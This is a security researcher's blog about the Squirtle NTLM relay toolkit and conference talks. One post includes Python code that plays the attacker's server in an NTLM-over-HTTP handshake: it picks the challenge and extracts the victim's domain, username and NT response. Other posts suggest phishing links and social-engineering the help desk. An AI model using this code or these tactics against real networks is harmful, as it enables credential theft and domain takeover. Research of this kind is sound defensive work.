Superimposing Nothing Nowhere

The internet is littered with wastes of space. This one is no different except that it is my waste of space.

Thursday, February 12, 2009

Where's grutz?

I've been very busy with a number of things and haven't been able to focus on fun things to share. Work work work work work! This year MacWorld did finally manage to fix their issue so no free platinum passes using the same, tired exploit! Squirtle has been put on the backburner for now and Valentine's Day is right around the corner. Too bad I'm not Cupid... and I'm filled with hatred and rage!

Here's to hoping your 2009 is a great one. Happy Chinese New Year!

Saturday, November 15, 2008

Squirtle and MS08-068

HD Moore already did some great analysis on how the MS08-068 patch affected the SMB Relay attacks within Metasploit. The answer?

You can no longer relay a victim's NTLM authentication back to the very host it came from over SMB once MS08-068 has been applied.

This ONLY affects Squirtle if your evil agent tries to relay the captured authentication back to the victim's own machine. It should not affect attacking their IMAP, HTTP or file/print servers: the fix changes how a single host handles its own SMB challenges, not what other hosts will accept.

As always, the goal of Squirtle is to let others extend their own tools to make use of NTLM authentication requests from controlled browsers, either on your own schedule or whenever the right users click on your evil link!

Have fun with the latest updates and thanks to Natron for pointing me towards HD's analysis.

Friday, November 14, 2008

Squirtle Updates: IMAP, Metasploit integration complete

I just gave a talk to everyone here at DeepSec 08. Other than the weather being a bit cold and wet, Vienna is awesome. Everyone seems happy to be at this conference and to share and network with each other. It's always fun giving the Squirtle talk to new audiences and seeing their eyes light up as they start to get why this attack matters to their environments or how they could use it on a client's penetration test.

With the conclusion of this talk I'm happy to announce that two new evil agent updates have been completed!

  • IMAP Mirroring! Download a victim's entire IMAP directory! Use social engineering, have the help desk e-mail them a new password!
  • Metasploit integration! SMB Relay an enterprise's server farm with Squirtle!

Get the latest updates from the Squirtle SVN at http://squirtle.googlecode.com/. The MSF update is a patch against the MSF 3.2 SVN code current as of this writing. If things change I'll try to keep it updated. Not sure if this is "MSF-code worthy" as it uses the JSON Ruby gem rather than parsing the result manually. I had the library installed and didn't want to write my own parser. :P

On Nov 11th MSRC posted some information on MS08-068, which changes how Windows handles NTLM authentication over SMB to neuter the SMB Relay attack and possibly (but not mentioned) Squirtle as well. I haven't had a chance to play with it yet as I didn't want to possibly spoil the live demos so close to DeepSec. It's nearly time to spend the evening at Metalab, so more information as it develops (I promise!)

Big thanks to everyone here at DeepSec for coordinating this one-of-a-kind conference. Vienna is such a beautiful place to visit; I only wish it were earlier in the season when it's not so cold and dreary outside. I hope to come next year for DeepSec 09!

Also, look for my ugly mug to make an appearance on Help Net Security soon. It's a brief plea on using Squirtle and hopefully my excitement over reaching more people isn't too transparent. :)

Tuesday, September 02, 2008

Upcoming Speaking Gigs

Tying a neat little bow on my NTLM/HTTP research, I'll be presenting "One XSS to Rule The Enterprise" at ToorCon X at the end of September and "NTLM SSO Weaknesses" at DeepSec in November. Both talks will show off the Squirtle Attack Toolkit. Hopefully I'll have some of the updates I didn't get into the DefCon release ready by ToorCon!

When friends ask "should I go to Defcon?" I always respond "Hey, check out ToorCon. It's in a nicer climate!" Vegas in July? Pfft, San Diego in September! One of the best conventions out there, period. Just check out the conference lineup!

Tuesday, August 12, 2008

Passing The Dutchie @ Defcon 16

Like many things with this blog, I don't prioritize it above things like hanging out with my girlfriend, going to work, sleeping, breaking my iPhone, losing all my Defcon pictures, etc.

Last weekend was Defcon 16. I had a really great time speaking to a packed house on the death of NTLM. Slides, slide video and source code to Squirtle are now available for your pleasure. I'll be doing some more work and documentation on Squirtle shortly.

A few quick changes were made to the slide deck from what was presented (and the slides on the CD are waaaaaay something different :). Mostly I added NTLM Signing as a mitigation and corrected the credit to state that JoMoKun did the Samba Pass-The-Hash modifications. Sorry!

More updates coming.

Thursday, August 07, 2008

NTLM is Dead: Defcon 16

Friday, August 8th @ 2pm. Come learn how to own an enterprise with one XSS!

Slides and other material will be on-line after Defcon. Source code available here.

Wednesday, July 30, 2008

Attacking NTLM

Defcon presentation times have been confirmed for a few weeks now and I've been slaving away at my slides and source code. I gave a pre-talk at work the other day and have decided to redo a lot of the slides. That's what you get when you ask for slides 38 days before the presentation. :)

Of course I'll have the full slides on-line after the conference but if you're coming to Defcon please come to my talk: Friday, August 8th at 2pm.

What exactly will I be talking about? Well, it's really difficult to describe succinctly but the best way I can say it is: An XSS inside your company == Total Domain Ownage.

Was that a scoff I just heard under your breath? Honestly, I'm not lying here. Because of the way NTLM and Windows Single Sign-On work, your run-of-the-mill cross-site scripting error on an internal resource can DEVASTATE your enterprise! A browser that considers a host part of the Intranet zone will answer that host's NTLM challenge silently, so script injected into one internal page can drive the user's browser to authenticate wherever the attacker points it.
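As an added illustration (not Squirtle's own code), the following shows the NTLM handshake an evil agent carries out over HTTP with a victim's browser: the 401 with WWW-Authenticate: NTLM, the Type 2 carrying whatever challenge the agent wants answered, and the Type 3 that comes back with domain, user, workstation and NT response. The browser's Type 1 and Type 3 are constructed here by helpers so the block runs offline; the field offsets follow the MS-NLMP message layout. Nothing in this exchange prompts the user when the browser treats the agent's host as Intranet zone, which is why one XSS is enough to start it.

```python
"""NTLM over HTTP as an evil agent sees it: the 401 dance and the Type 3.

Added example, not Squirtle's code. Type 1 / Type 3 builders stand in for the
victim's browser so the block runs offline; the target name and credentials
below are constructed.
"""
import base64
import struct
import secrets

SIG = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001   # strings are UTF-16LE
NEGOTIATE_NTLM = 0x00000200


def _field(data: bytes, off: int) -> bytes:
    # A security-buffer descriptor: Len(2) MaxLen(2) Offset(4), little-endian.
    length, _maxlen, offset = struct.unpack_from("<HHI", data, off)
    return data[offset:offset + length]


def build_type1() -> bytes:
    # NEGOTIATE_MESSAGE: signature, type 1, flags, empty domain/workstation.
    return SIG + struct.pack("<II", 1, NEGOTIATE_UNICODE | NEGOTIATE_NTLM) + b"\x00" * 16


def build_type2(server_challenge: bytes, target: str = "SQUIRTLE") -> bytes:
    # CHALLENGE_MESSAGE: signature, type 2, TargetName fields, flags,
    # 8-byte ServerChallenge, 8 reserved bytes, TargetInfo fields, payload.
    # The agent chooses the challenge, so it can be one obtained elsewhere.
    name = target.encode("utf-16-le")
    header_len = 48
    msg = SIG + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(name), len(name), header_len)
    msg += struct.pack("<I", NEGOTIATE_UNICODE | NEGOTIATE_NTLM)
    msg += server_challenge + b"\x00" * 8
    msg += struct.pack("<HHI", 0, 0, header_len + len(name))
    return msg + name


def build_type3(domain: str, user: str, workstation: str,
                nt_response: bytes, lm_response: bytes = b"\x00" * 24) -> bytes:
    # AUTHENTICATE_MESSAGE as a client lays it out (no Version/MIC block).
    enc = "utf-16-le"
    parts = [lm_response, nt_response, domain.encode(enc),
             user.encode(enc), workstation.encode(enc), b""]
    fields, payload, off = b"", b"", 64          # 12-byte header + 6 fields + flags
    for p in parts:
        fields += struct.pack("<HHI", len(p), len(p), off)
        payload += p
        off += len(p)
    flags = struct.pack("<I", NEGOTIATE_UNICODE | NEGOTIATE_NTLM)
    return SIG + struct.pack("<I", 3) + fields + flags + payload


def parse_type3(data: bytes) -> dict:
    # Descriptors sit at fixed offsets: LM resp @12, NT resp @20, domain @28,
    # user @36, workstation @44, session key @52, NegotiateFlags @60.
    if data[:8] != SIG or struct.unpack_from("<I", data, 8)[0] != 3:
        raise ValueError("not an NTLM Type 3 message")
    flags = struct.unpack_from("<I", data, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "cp437"  # OEM otherwise
    return {
        "domain": _field(data, 28).decode(enc),
        "user": _field(data, 36).decode(enc),
        "workstation": _field(data, 44).decode(enc),
        "lm_response": _field(data, 12),
        "nt_response": _field(data, 20),
    }


def ntlm_http_step(authorization, server_challenge: bytes):
    """One round trip of the 401 dance. Returns (status, WWW-Authenticate value,
    parsed credentials or None). Authorization is the request header or None."""
    if not authorization or not authorization.startswith("NTLM "):
        return 401, "NTLM", None                          # ask for NTLM
    msg = base64.b64decode(authorization[5:])
    mtype = struct.unpack_from("<I", msg, 8)[0] if msg[:8] == SIG else None
    if mtype == 1:                                         # browser negotiates
        t2 = build_type2(server_challenge)
        return 401, "NTLM " + base64.b64encode(t2).decode(), None
    if mtype == 3:                                         # the goods
        return 200, None, parse_type3(msg)
    return 400, None, None


def demo(server_challenge: bytes) -> dict:
    # Drive the three requests a browser would make; the Type 3 is constructed.
    status, hdr, _ = ntlm_http_step(None, server_challenge)
    assert (status, hdr) == (401, "NTLM")
    t1 = "NTLM " + base64.b64encode(build_type1()).decode()
    status, hdr, _ = ntlm_http_step(t1, server_challenge)
    assert status == 401 and base64.b64decode(hdr[5:])[24:32] == server_challenge
    nt_resp = secrets.token_bytes(16) + b"\x01\x01" + b"\x00" * 6   # constructed
    t3 = "NTLM " + base64.b64encode(build_type3("CORP", "alice", "WS01", nt_resp)).decode()
    status, _, creds = ntlm_http_step(t3, server_challenge)
    assert status == 200
    return creds


if __name__ == "__main__":
    print(demo(secrets.token_bytes(8)))
```

The agent never learns the password; what it holds after the third request is a response to a challenge it chose, which is why choosing that challenge to match one a real target just issued turns the same exchange into a relay.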

Stay tuned.